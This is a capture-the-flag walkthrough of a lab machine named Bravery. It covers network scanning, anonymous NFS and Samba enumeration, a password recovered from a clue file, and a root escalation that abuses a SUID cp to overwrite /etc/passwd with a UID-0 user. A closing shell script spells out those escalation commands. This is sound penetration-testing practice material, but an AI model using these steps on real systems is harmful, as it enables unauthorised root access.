Bravery
Recon
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -r 192.168.80.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.80.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.80.2 00:50:56:ed:65:ac 1 60 VMware, Inc.
192.168.80.131 00:0c:29:5a:0f:b5 1 60 VMware, Inc.
192.168.80.133 00:0c:29:b9:af:ac 1 60 VMware, Inc.
192.168.80.254 00:50:56:fd:b9:5a 1 60 VMware, Inc.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -p- -sV 192.168.80.131
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 00:49 EDT
Nmap scan report for 192.168.80.131
Host is up (0.0010s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
53/tcp    open  domain      dnsmasq 2.76
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
111/tcp   open  rpcbind     2-4 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     3 (RPC #100227)
3306/tcp  open  mysql       MariaDB (unauthorized)
8080/tcp  open  http        nginx 1.12.2
20048/tcp open  mountd      1-3 (RPC #100005)
37985/tcp open  status      1 (RPC #100024)
44626/tcp open  nlockmgr    1-4 (RPC #100021)
MAC Address: 00:0C:29:5A:0F:B5 (VMware)
Service Info: Host: BRAVERY
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.52 seconds
The target exposes a wide set of services: DNS, HTTP and HTTPS (Apache on 80/443, nginx on 8080), Samba (139/445), NFS (2049 plus the rpcbind/mountd/nlockmgr helpers), MariaDB and SSH. The file-sharing services are the natural place to start, since both NFS and Samba may be readable without credentials.
Process
┌──(kali㉿kali)-[~/Labs/Bravery]
└─$ sudo mount -t nfs 192.168.80.131:/ nfs
┌──(kali㉿kali)-[~/…/Bravery/nfs/var/nfsshare]
└─$ ls
discovery enumeration explore itinerary password.txt qwertyuioplkjhgfdsazxcvbnm README.txt
Most of the contents are of little use, but one oddly named file stands out (keep it in mind; it matters later).
┌──(kali㉿kali)-[~/…/Bravery/nfs/var/nfsshare]
└─$ cat qwertyuioplkjhgfdsazxcvbnm
Sometimes, the answer you seek may be right before your very eyes.
The NFS export holds little else of value, so we turn to Samba. The target is a Linux host, and the standard tool for enumerating its Samba configuration is enum4linux.
From the enum4linux output we obtain the local users and the shared folders on the host (partial output below).
======================================( Users on 192.168.80.131 )======================================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: david Name: david Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: rick Name: Desc:
user:[david] rid:[0x3e8]
user:[rick] rid:[0x3e9]
================================( Share Enumeration on 192.168.80.131 )================================
Sharename Type Comment
--------- ---- -------
anonymous Disk
secured Disk
IPC$ IPC IPC Service (Samba Server 4.7.1)
This gives us two users, david and rick, and two disk shares, anonymous and secured. We first connect to the anonymous share with smbclient, using a null session (empty user and password).
┌──(kali㉿kali)-[~/Labs/Bravery]
└─$ smbclient //192.168.80.131/anonymous -U %
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Sep 28 09:01:35 2018
.. D 0 Thu Jun 14 12:30:39 2018
patrick's folder D 0 Fri Sep 28 08:38:27 2018
qiu's folder D 0 Fri Sep 28 09:27:20 2018
genevieve's folder D 0 Fri Sep 28 09:08:31 2018
david's folder D 0 Tue Dec 25 21:19:51 2018
kenny's folder D 0 Fri Sep 28 08:52:49 2018
qinyi's folder D 0 Fri Sep 28 08:45:22 2018
sara's folder D 0 Fri Sep 28 09:34:23 2018
readme.txt N 489 Fri Sep 28 09:54:03 2018
17811456 blocks of size 1024. 12839656 blocks available
The listing yields a few more user names and a readme.txt, but the folders themselves hold nothing useful; readme.txt only says that this Samba share may soon be replaced by SharePoint. So we try the other share, secured, which requires credentials. Here the earlier clue pays off: the odd file name from the NFS export, qwertyuioplkjhgfdsazxcvbnm, is the password of the david account. Inside the share we find three files.
┌──(kali㉿kali)-[~/Labs/Bravery/smbd]
└─$ cat david.txt
I have concerns over how the developers are designing their webpage. The use of "developmentsecretpage" is too long and unwieldy. We should cut short the addresses in our local domain.
1. Reminder to tell Patrick to replace "developmentsecretpage" with "devops".
2. Request the intern to adjust her Favourites to http://<developmentIPandport>/devops/directortestpagev1.php.
david.txt is another clue, though not one this machine actually uses. The key file is genevieve.txt, which contains a URL worth a closer look.
┌──(kali㉿kali)-[~/Labs/Bravery/smbd]
└─$ cat genevieve.txt
Hi! This is Genevieve!
We are still trying to construct our department's IT infrastructure; it's been proving painful so far.
If you wouldn't mind, please do not subject my site (http://192.168.254.155/genevieve) to any load-test as of yet. We're trying to establish quite a few things:
a File-share to our director.
b Setting up our CMS.
c Requesting for a HIDS solution to secure our host.
We browse to that path on the target and find what looks like a CMS test page.
Privilege Escalation
Searching the host for binaries with the setuid (SUID) bit set, we find cp. A root-owned SUID cp can overwrite any file, including /etc/passwd, so adding a UID-0 user (here called hacker) to a copy of /etc/passwd and copying it back gives a root shell.
One caveat: the password hash for the hacker user must be in a format the target's crypt(3) accepts. CentOS 7 and a current Ubuntu or Kali do not share the same default algorithm: the target's glibc verifies $1$ (MD5), $5$ (SHA-256) and $6$ (SHA-512) hashes, but not the $y$ (yescrypt) hashes that mkpasswd or the Python crypt module produce by default on a modern Kali/Ubuntu, so a hash generated with the wrong defaults is silently rejected at login.
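The procedure above, as an added example that is not part of the original writeup: it builds the passwd(5) line for the hacker user, refuses hash formats the target's crypt(3) cannot verify, and shows how the SUID cp is used to plant it. It assumes the target is CentOS 7 (glibc crypt accepting $1$, $5$ and $6$ only); the user name hacker, the password and the /tmp working path are illustrative.

```shell
#!/bin/sh
# Added example, not code from the original writeup.
# Assumptions (not from the page): target is CentOS 7, whose glibc crypt(3)
# verifies $1$ (MD5), $5$ (SHA-256) and $6$ (SHA-512) hashes but not $y$
# yescrypt; "hacker", the password and /tmp are illustrative choices.

# Return 0 when the hash prefix is one the target's crypt(3) can verify.
target_supports_hash() {
    case "$1" in
        '$1$'*|'$5$'*|'$6$'*) return 0 ;;
        *) return 1 ;;   # e.g. $y$ from mkpasswd on a current Kali/Ubuntu
    esac
}

# Print a passwd(5) line with the hash directly in field 2 (so no
# /etc/shadow entry is needed) and UID/GID 0, so "su hacker" yields root.
passwd_line() {
    user="$1"; hash="$2"
    if ! target_supports_hash "$hash"; then
        echo "hash format not supported by target crypt(3): $hash" >&2
        return 1
    fi
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$user" "$hash"
}

# Generate the hash on Kali, not on the target: the target's OpenSSL 1.0.2k
# has no -6 option.
#   HASH=$(openssl passwd -6 'S3cretPass')
# Then on the target, after confirming cp is SUID
# (find / -perm -4000 -type f 2>/dev/null):
#   cp /etc/passwd /tmp/passwd
#   passwd_line hacker "$HASH" >> /tmp/passwd
#   cp /tmp/passwd /etc/passwd     # SUID cp writes the file as root
#   su hacker
```

Keep the original /etc/passwd copy so it can be restored afterwards; overwriting it with a malformed line can lock every account out of the host.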